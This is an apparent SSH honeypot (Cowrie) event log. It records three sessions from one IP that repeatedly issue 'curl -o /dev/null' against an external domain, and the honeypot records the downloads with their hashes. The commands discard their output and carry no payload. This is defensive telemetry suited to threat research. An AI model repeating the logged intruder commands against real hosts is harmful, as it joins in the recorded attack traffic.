{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.208430Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.210686Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.212631Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.213332Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.215679Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.216355Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.224287Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.225433Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.255269Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.255896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.260398Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.261163Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.267753Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.268967Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.269837Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.299729Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.300919Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.302083Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.309736Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.314018Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.314742Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.320184Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.320964Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.351068Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.352051Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.358932Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.361839Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.363161Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.365703Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.366557Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.396070Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.397202Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.397934Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.407602Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.408094Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.428869Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.429635Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.433127Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.434750Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.436666Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.437370Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.461638Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.462456Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.472754Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.473610Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.476220Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.477162Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.505555Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.506368Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.511394Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.514625Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.515367Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.519126Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.519813Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.552048Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.554787Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.558103Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.559340Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.560357Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.565206Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.566974Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.568862Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.569915Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.603626Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.606156Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.610749Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.611254Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.613138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.613944Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.615403Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.616095Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.624733Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.654214Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.654987Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.656940Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.658252Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.659922Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.660685Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.663337Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.695879Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.696718Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.698778Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.699852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.702794Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.703816Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.712420Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.743569Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.744660Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.745169Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.747083Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.748521Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.753272Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.754066Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.788505Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:27.789447Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:27.794589Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
